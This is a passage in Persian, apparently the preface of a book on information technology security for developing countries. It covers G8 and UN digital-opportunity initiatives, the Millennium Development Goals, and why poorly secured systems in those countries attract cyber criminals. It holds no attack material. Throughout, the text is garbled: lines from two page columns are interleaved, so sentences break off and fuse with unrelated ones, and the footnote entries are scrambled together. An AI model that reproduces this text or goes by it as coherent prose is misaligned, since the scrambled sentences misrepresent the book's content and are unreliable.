ﺟﻴﻤﺰ ﻭﻟﻔﺴﻦ ١ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﻮﺩ ﻛﻪ ﺑﺮ ﺍﻫﻤﻴﺖ ﺑـﻪﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﻪ ﺷـﻜﻞ ﻏﻴﺮﻣـﺴﺘﻘﻴﻢ
ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﻧﻴﻞ ﺑﻪ ﺍﻫـﺪﺍﻑ ﺗﻮﺳـﻌﺔ ﺍﻗﺘـﺼﺎﺩﻱ -ﺍﺟﺘﻤـﺎﻋﻲ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎ ﺭﺍ ﺩﺭ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻫﺪﺍﻑ ﺗﻮﺳـﻌﻪﺍﻱ ﻫـﺰﺍﺭﻩ
ﺗﺄﻛﻴﺪ ﺯﻳﺎﺩﻱ ﺩﺍﺷﺖ .ﺍﺯ ﺁﻥ ﺯﻣﺎﻥ ﺑﻪ ﺑﻌﺪ ﺧﻮﺵﺑﻴﻨﻲ ﻧـﺴﺒﺖ ﺑـﻪ
) ١٠(MDGﭘــﺸﺘﻴﺒﺎﻧﻲ ﻛﻨــﺪ .ﺳﻴﺎﺳــﺘﻬﺎﻱ ﺍﺻــﻠﻲ ﺗــﺄﻣﻴﻦ ﺍﻣﻨﻴــﺖ
ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ -ﺍﺟﺘﻤﺎﻋﻲ ﺑﻴﺸﺘﺮ ﺷـﺪ ﻛـﻪ ﺑﺨـﺸﻲ ﺍﺯ ﺁﻥ ﺑـﻪ
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺁﻧﻬـﺎ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﺭ ﺑﺎﻋـﺚ
ﺩﻟﻴﻞ ﺗﻮﺳﻌﺔ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﺭﺯﺍﻥ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑﻮﺩ.
ﺗﻘﻮﻳﺖ ﺟﺮﻳﺎﻥ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﻣـﺴﺘﻘﻴﻢ ﺧـﺎﺭﺟﻲ ﺩﺭ ﺁﻥ ﻛـﺸﻮﺭ
ﺧﻮﺍﻫﺪ ﺷﺪ ﻭ ﺍﻳﻦ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎ ﺑﻪ ﻓﺮﺍﻫﻢ ﺷﺪﻥ ﺍﻋﺘﺒـﺎﺭ ﺑـﺮﺍﻱ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﻛـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ﮔـﺮﻭﻩ ،G8ﻛﻤﻴﺘـﺔ ﻛـﺎﺭﻱ
ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﻣﻲﺍﻧﺠﺎﻣﺪ. ﻓﺮﺻــﺘﻬﺎﻱ ﺩﻳﺠﻴﺘــﺎﻟﻲ ) ٢(DOTﺭﺍ ﭘﺎﻳــﻪﺭﻳــﺰﻱ ﻛﺮﺩﻧــﺪ .ﻛﻤﻴﺘــﺔ
DOTﻧﺘﺎﻳﺞ ﻛﺎﺭ ﺧﻮﺩ ﺭﺍ ﻃﻲ ﮔﺰﺍﺭﺷﻲ ﺍﺭﺍﺋـﻪ ﻧﻤـﻮﺩ ﻭ ﺧﻮﺍﺳـﺘﺎﺭ
ﺣﺎﻝ ﺍﻳﻦ ﺳﺆﺍﻝ ﭘﻴﺶ ﻣﻲﺁﻳﺪ ﻛﻪ ﭼﺮﺍ ﺑﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﻛﻪ ﺩﺭ ﻭﻫﻠـﺔ
ﻗﺮﺍﺭﮔﺮﻓﺘﻦ ۹ﻣﻮﺿﻮﻉ ﺩﺭ ﻃﺮﺡ ﺍﺟﺮﺍﻳﻲ ﮊﻧﻮ ٣ﺷﺪ ﻛﻪ ﻫﻤـﺔ ﺁﻧﻬـﺎ
ﺍﻭﻝ ﺑﺮﺍﻱ ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﻧﮕﺎﺷـﺘﻪ
ﺩﺭ ﺍﺟــﻼﺱ ﺳــﺮﺍﻥ ﮊﻧــﻮ ﺩﺭ ﺳــﺎﻝ ۲۰۰۱ﺑــﻪ ﺗﺄﻳﻴــﺪ ﻭ ﺍﻣــﻀﺎﻱ
ﺷﺪﻩ ﻧﻴﺎﺯ ﺍﺳﺖ .ﺩﺭ ﭘﺎﺳﺦ ﺑﻪ ﺍﻳﻦ ﭘﺮﺳﺶ ﺑﺎﻳﺪ ﮔﻔﺖ ﻛـﻪ ﺍﺻـﻮﻝ
ﺭﻫﺒــﺮﺍﻥ ﮔــﺮﻭﻩ G8ﺭﺳــﻴﺪﻧﺪ .ﺍﻋــﻀﺎﻱ ﺍﺻــﻠﻲ ﻛﻤﻴﺘــﺔ DOT
ﺍﻣﻨﻴﺘﻲ ﻫﻤﻮﺍﺭﻩ ﻳﻜﺴﺎﻧﻨﺪ؛ ﻣﺴﺘﻘﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﺭ
ﺳﻬﺎﻣﺪﺍﺭﺍﻥ ﺍﺻﻠﻲ ﮔـﺮﻭﻩ G8ﻭ ﺩﻭﻟﺘﻬـﺎﻱ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ
ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ،ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﻳـﺎ ﺗﻮﺳـﻌﻪﻧﻴﺎﻓﺘـﻪ ﺑﺎﺷـﻴﺪ؛ ﭼﺮﺍﻛـﻪ
ﺗﻮﺳﻌﻪ ،ﺑﺨﺸﻬﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻧﺒـﻮﻫﻲ
ﻓﻨﺎﻭﺭﻳﻬﺎ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻫـﺮ ﮔﻮﺷـﺔ
ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻫﺴﺘﻨﺪ .ﮔﺰﺍﺭﺵ ﻣﺰﺑـﻮﺭ ﺷـﺎﻣﻞ ۷ﺑﻨـﺪ
ﺟﻬﺎﻥ ﻇﺎﻫﺮ ﺷﻮﻧﺪ .ﺍﻟﺒﺘﻪ ﺭﺍﻫﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﺮﺍﻱ ﺍﻳﻤـﻦ ﻛـﺮﺩﻥ
ﻋﻤﻠﻴــﺎﺗﻲ ﺑﻌﻨــﻮﺍﻥ ﻣﻮﺿــﻮﻋﺎﺕ ﺣﻴــﺎﺗﻲ ﺑــﺮﺍﻱ ﺍﻳﺠــﺎﺩ ﺟﺎﻣﻌــﺔ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺑـﻲ ﺗﺮﺩﻳـﺪ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ
ﺍﻃﻼﻋﺎﺗﻲ ﻣﻲﺑﺎﺷﺪ:
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻫﻤﻴﺸﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﻭ ﺍﺭﺯﺍﻥ ﻧﻴﺴﺘﻨﺪ.
(۱ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎ
(۲ﺍﺭﺗﻘﺎ ﻭ ﺑﻬﺒﻮﺩ ﺩﺳﺘﺮﺳﻲ
4 U.N. Secretary General's ICT Task Force
(۳ﺗﻮﺳﻌﺔ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ
5 Global Digital Opportunities Initiative
6 United Nations Development Program
7 Accenture Foundation
8 Markle Foundation 1 James Wolfensohn
9 World Summit on Information Society 2 Digital Opportunity Taskforce Group
10 Millennium Development Goals 3 Genoa Plan of Action
١٥ ﭘﻴﺶﺩﺭﺁﻣﺪ
ﻋﻤﻮﻡ ﻣﺮﺩﻡ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﺎﻳﺞ ﻧﺎﻣﻄﻠﻮﺑﻲ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ .ﺩﻭﻟﺘﻬﺎ ﺍﺑﺘﺪﺍ ﺫﻛﺮ ﺍﻳﻦ ﻧﻜﺘﻪ ﻣﻬﻢ ﺍﺳﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺭﺍﻳﺎﻧـﻪ ﺩﺭ
ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻋﻤﻮﻣﹰﺎ ﺗﻮﺍﻧـﺎﻳﻲ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺩﺳﺘﺮﺳﻲ ﺑـﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﭼﻨﻴﻦ ﻧﻘﺼﻬﺎﻳﻲ ﺭﺍ ﺩﺍﺭﻧﺪ ،ﻭﻟـﻲ ﻧﺘـﺎﻳﺞ ﻧﺎﺷـﻲ ﺍﺯ ﺑـﺮﻭﺯ ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﺗﻜﻨﻴﻜﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺯﻣﻴﻨﻪﻫـﺎﻱ ﻣﺨﺘﻠـﻒ
ﻧﻘــﺼﻬﺎ ﻭ ﺍﺷــﻜﺎﻻﺕ ﺍﻣﻨﻴﺘــﻲ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣــﺎﻝ ﺗﻮﺳــﻌﻪ ﻛﺎﺭﻱ ﺑـﻪ ﺁﻧﻬـﺎ ﻛﻤـﻚ ﻧﻤﺎﻳـﺪ .ﺑـﺮﺍﻱ ﻣﺜـﺎﻝ ﻛﺘﺎﺑﻔﺮﻭﺷـﻲﻫـﺎ ﻭ
ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻭﺧﻴﻢﺗﺮ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺑﺎﺷﺪ .ﺩﺭ ﻛﻨﺎﺭ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎﻱ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ
ﻫﻤﺔ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ،ﺑﺎﺯﺍﺭﻫﺎ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺩﻭﻟﺘﻬﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﻭ ﻟﺬﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤﻚ ﺍﺯ ﺍﻓـﺮﺍﺩ ﻫـﻢﺻـﻨﻒ ﺩﻳﮕـﺮ ﺑـﻪ ﺭﺍﺣﺘـﻲ
ﺗﻮﺳﻌﻪ ﺑﻪ ﺩﻟﻴـﻞ ﻋـﺪﻡ ﺗﻮﺟـﻪ ﺑـﻪ ﻋﻮﺍﻗـﺐ ﻧﺎﺷـﻲ ﺍﺯ ﻧﻔﻮﺫﻫـﺎﻱ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻣﻲﺑﺎﺷﺪ .ﺯﻣﺎﻧﻲ ﻛﻪ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺒﻜﻪ ﺩﭼﺎﺭ ﺍﺷـﻜﺎﻝ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺣﺠﻢ ﻭﺳﻴﻊ ،ﻋﺪﻡ ﺗﻮﺍﻧﺎﻳﻲ ﺗﺤﻠﻴﻞ ﺿـﺮﺭﻫﺎﻱ ﻣـﺎﻟﻲ ﻣﻲﺷﻮﺩ ،ﻣﺠﻤﻮﻋﻪﺍﻱ ﻏﻨﻲ ﺍﺯ ﻛﺎﻧﺎﻟﻬـﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ
ﻧﺎﺷﻲ ﺍﺯ ﺍﻳﻦ ﺣﻤﻼﺕ ،ﻭ ﻧﻴﺰ ﻧﺪﺍﺷﺘﻦ ﺗﺨﻤﻴﻦ ﻣﻨﺎﺳـﺐ ﺍﺯ ﺯﻣـﺎﻥ ﻛﻪ ﺍﺧﺒﺎﺭ ﻭ ﺍﻃﻼﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬـﺎ ﺍﺭﺳـﺎﻝ ﻣـﻲﮔـﺮﺩﺩ.
ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺧﺴﺎﺭﺍﺕ ﻭﺍﺭﺩﻩ )ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﻳﻦ ﺧﺴﺎﺭﺍﺕ ﻗﺎﺑﻞ ﺗﺮﻣﻴﻢ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﺩﺍﺭﺍﻱ
ﺑﺎﺷﻨﺪ( ﺗﻤﺎﻳﻞ ﭼﻨﺪﺍﻧﻲ ﺑﻪ ﺭﻓﻊ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻧﺪﺍﺭﻧﺪ. ﻣﺮﺍﻛﺰ ﻛﻤﻚﺭﺳﺎﻧﻲ ١١ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺳﻂ ﻣﺘﺨﺼﺼﻴﻦ ﻓﻨـﻲ ﺍﺩﺍﺭﻩ
ﻣﻲﺷﻮﻧﺪ ﻭ ﻗﺎﺩﺭ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺩ ﺳﻮﺀ ﻣﻨـﺎﺑﻊ ﺳـﺎﺯﻣﺎﻧﻲ ﻭ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﺎﻳﺪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻌﻨـﻮﺍﻥ ﺍﻭﻟﻮﻳـﺖ
ﺗﺄﻣﻴﻦ ﺣﻔﺎﻇﺖ ﺁﻧﻬﺎ ﻣﻲﺑﺎﺷﻨﺪ.
ﺍﺻﻠﻲ ﺧﻮﺩ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻧﺪ ،ﭼﺮﺍﻛﻪ ﺧﻄـﺮ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺗﺒﻬﻜﺎﺭﺍﻧـﻪ
ﺑﻴﺸﺘﺮ ﻣﺘﻮﺟﻪ ﻣﻜﺎﻧﻬﺎﻳﻲ ﺍﺳﺖ ﻛـﻪ ﺍﺯ ﻛﻨﺘـﺮﻝ ﻛـﺎﻓﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﻻ
ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﻣﻌﻤـﻮ ﹰ
ﻧﺒﻮﺩﻩ ﻭ ﻧﺎﺍﻣﻦ ﻫﺴﺘﻨﺪ .ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻛـﻪ ﻓﺎﻗﺪ ﺗﻮﺍﻧﺎﻳﻲ ﺍﺭﺍﺋﻪ ﺍﻳﻦ ﺳﻄﺢ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻫﺴﺘﻨﺪ .ﺗﻌﺪﺍﺩ ﻛﺎﺭﺑﺮﺍﻥ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺁﻧﻬـﺎ ﻛﻤﺘـﺮ ﺗـﺄﻣﻴﻦ ﺷـﺪﻩ ﺍﻫـﺪﺍﻑ ﺍﻧﺪﻙ ﺍﺳﺖ ﻭ ﺑﻪ ﻫﺸﺪﺍﺭﻫﺎ ﻭ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻧﻴـﺰ ﺗﻮﺟـﻪ
ﺟﺬﺍﺏﺗﺮﻱ ﺑـﺮﺍﻱ ﺣﻤﻠـﻪ ﻫـﺴﺘﻨﺪ .ﻛـﺪﺍﻡ ﺳـﺎﺯﻣﺎﻥ ﻛﻮﭼـﻚ ﻳـﺎ ﻧﻤﻲﺷﻮﺩ .ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻏﺎﻟﺒﹰﺎ ﺩﺍﺭﺍﻱ
ﻣﺘﻮﺳﻂ ﺍﺳﺖ ﻛﻪ ﻋﻠﻴﺮﻏﻢ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﺔ ﺑﺨﺶ ﺳﺘﺎﺩﻱ ﻛﻮﭼﻜﻲ ﻫﺴﺘﻨﺪ ﻭ ﻟﺬﺍ ﺗﻮﺍﻧﺎﻳﻲ ﻧﻈﺎﺭﺕ ﺑـﺮ ﻣﻨـﺎﺑﻊ
ﻣﺸﺘﺮﻳﺎﻥ ،ﻓﺎﻳﻠﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﻭ ﻳـﺎ ﺩﺳـﺘﻜﺎﺭﻱ ﺷـﺪﻥ ﺍﻃﻼﻋـﺎﺕ ﻓﻨﻲ ﺩﺍﺧﻠﻲ ﺧﻮﺩ ﺭﺍ ﻧﺪﺍﺭﻧﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻭﻗﺎﺕ ﺍﻳﻦ ﻋﺪﻡ ﺗﻮﺟـﻪ ﻭ
ﻛﻠﻴﺪﻱ ﺳـﺎﺯﻣﺎﻥ ﻫﻤﭽﻨـﺎﻥ ﺑﺘﻮﺍﻧـﺪ ﭘﺎﺑﺮﺟـﺎ ﺑﻤﺎﻧـﺪ؟ ﻛـﺸﻮﺭﻫﺎﻱ ﻧﺎﺗﻮﺍﻧﻲ ﺑﻪ ﺩﻟﻴﻞ ﻋﺪﻡ ﻭﺟﻮﺩ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺩﺍﻧـﺶ ﻛـﺎﻓﻲ ﺩﺭﺑـﺎﺭﺓ
ﻲ ﺁﻣـﻮﺯﺵﺩﻳـﺪﻩ ﻭ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﺑﺎﻳـﺪ ﻇﺮﻓﻴـﺖ ﻣﻨـﺎﺑﻊ ﺍﻧـﺴﺎﻧ ﹺ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺍﺳـﺖ ،ﻭ ﮔﺮﻭﻫﻬـﺎﻳﻲ ﻛـﻪ
ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺧﻮﺩ ﺭﺍ ﺑﻬﺒﻮﺩ ﺑﺨﺸﻨﺪ ﺗـﺎ ﺍﻫـﺪﺍﻑ ﺁﺳـﺎﻧﻲ ﻻ ﺩﺭ ﻓﻬـﻢ ﭼﮕـﻮﻧﮕﻲ ﺍﺻﻮﻝ ﺍﺳﺎﺳﻲ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻩﺍﻧﺪ ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ
ﺑﺮﺍﻱ ﺣﻤﻠﺔ ﺗﺒﻬﻜﺎﺭﺍﻥ ﻓﻀﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﺒﺎﺷـﻨﺪ .ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺳﺎﺯﮔﺎﺭﺳﺎﺯﻱ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻓﻨـﻲ ﺑـﺎ ﺷـﺮﺍﻳﻂ ﻣﺘﻐﻴـﺮ ﻭ ﻏﻴﺮﻗﺎﺑـﻞ
ﺑﺤﺜﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺩﺭﺑﺎﺭﺓ ﻣﺎﻫﻴﺖ ﻣﻮﺿـﻮﻉ ﺍﻣﻨﻴـﺖ ﻣﻄـﺮﺡ ﺷـﺪﻩ ﻲ ﺍﻳﻦ ﻣﺤﻴﻂ ﻣﺸﻜﻞ ﺩﺍﺭﻧﺪ. ﭘﻴﺶﺑﻴﻨ ﹺ
ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺩﻳﺪﮔﺎﻩﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺧﺪﻣﺎﺕ ﭘﺲ ﺍﺯ ﻓـﺮﻭﺵ ﺩﺭ ﮔﺬﺷـﺘﻪ ﺑـﺼﻮﺭﺕ ﻧﺎﻣﺤـﺪﻭﺩ ﺑـﺮﺍﻱ
ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺩﺍﺩﻩﻫﺎ ﻧﮕﺮﺍﻧﻲ ﺩﺍﺭﻧـﺪ ﺑـﻪ ﺍﻳـﻦ ﺭﺍﻳﺎﻧﻪ ﻫﺎﻳﻲ ﻛﻪ ﻛـﻢﺗﻌـﺪﺍﺩ ﻭ ﮔﺮﺍﻧﻘﻴﻤـﺖ ﺑﻮﺩﻧـﺪ ﺩﺭﻧﻈـﺮ ﮔﺮﻓﺘـﻪ
ﻣــﺴﺌﻠﻪ ﺑﻌﻨــﻮﺍﻥ ﻳــﻚ ﻣﻮﺿــﻮﻉ ﺩﺭ ﺣــﻮﺯﺓ ﺍﻣﻨﻴــﺖ ﺍﻃﻼﻋــﺎﺕ ﻣﻲﺷﺪ؛ ﺍﻣﺎ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺣﺠﻢ ﺍﻧﺒـﻮﻩ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺩﺭ
ﻲ ﺫﺧﻴـﺮﻩ ﻭ ﺍﺭﺳـﺎﻝ ﻣﻲﻧﮕﺮﻧﺪ؛ ﻛـﺴﺎﻧﻴﻜﻪ ﺑـﺎ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﻓﻨـ ﹺ
ﺑﺎﺯﺍﺭ ﻧﻤﻲﺗﻮﺍﻥ ﺑﺴﺎﺩﮔﻲ ﭼﻨﻴﻦ ﺧﺪﻣﺎﺗﻲ ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﺮﺩ .ﻓﺮﻭﺷﮕﺎﻫﻬﺎ
ﺍﻃﻼﻋﺎﺕ ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ ﺍﻳﻦ ﻣﺒﺤﺚ ﺭﺍ ﺍﺯ ﺩﻳﺪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﻭ
ﻻ ﺍﺯ ﻣـﺸﻜﻼﺗﻲ ﻛـﻪ ﺩﺭ ﻭ ﻣﺮﺍﻛﺰ ﺧﺪﻣﺎﺕ ﺗﻌﻤﻴﺮﺍﺕ ﺭﺍﻳﺎﻧﻪ ﻣﻌﻤـﻮ ﹰ
ﺷﺒﻜﻪ ﻣﻲ ﺑﻴﻨﻨﺪ؛ ﺣﺎﻝ ﺁﻧﻜﻪ ﺩﻳﮕﺮﺍﻧﻲ ﻛـﻪ ﺑـﻪ ﺗﺠـﺎﺭﺕ ﻣـﺸﻐﻮﻝ
ﺳﺎﻳﺮ ﻧﻘﺎﻁ ﺩﻧﻴﺎ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ ﻣﻄﻠﻊ ﻧﻴﺴﺘﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﺎﺭﺑﺮﺍﻥ
ﻫﺴﺘﻨﺪ ﺑﻪ ﺁﻥ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﺣـﻮﺯﺓ ﺟﺪﻳـﺪ ﺩﺭ ﺗﺠـﺎﺭﺕ ﻭ ﻋﻤﻮﻣـﹰﺎ
ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺑﻪ ﻗﺮﺑﺎﻧﻴـﺎﻥ ﺗﻮﺳـﻌﺔ ﺍﻃﻼﻋـﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺍﻣﻨﻴـﺖ
ﺗﺤﺖ ﻋﻨﻮﺍﻥ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﮕﺎﻩ ﻣﻲﻛﻨﻨﺪ. ﻓﻨﺎﻭﺭﻱ ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﻧﺪ.
ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻣﺎ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻩﺍﻳﻢ ﺗﻤﺎﻡ ﻣﺒـﺎﺣﺜﻲ ﻛـﻪ ﺩﺭ ﻧﻘﺺ ﺍﻣﻨﻴﺘﻲ ﺷﺒﻜﻪ ﺩﺭ ﻫﻤﺔ ﻛﺸﻮﺭﻫﺎ ﺍﺗﻔـﺎﻕ ﻣـﻲﺍﻓﺘـﺪ ﻭ ﺣﺘـﻲ
ﻣﻘﻮﻟﻪ "ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ" ﻣﻲﮔﻨﺠـﺪ ﺭﺍ ﺍﺭﺍﺋـﻪ ﻛﻨـﻴﻢ ﻭ ﺍﺯ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻮﺟﺐ ﺗﺤﺖ ﻓﺸﺎﺭ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﻭﻟﺘﻬﺎ ﻧﻴﺰ ﺑﮕـﺮﺩﺩ.
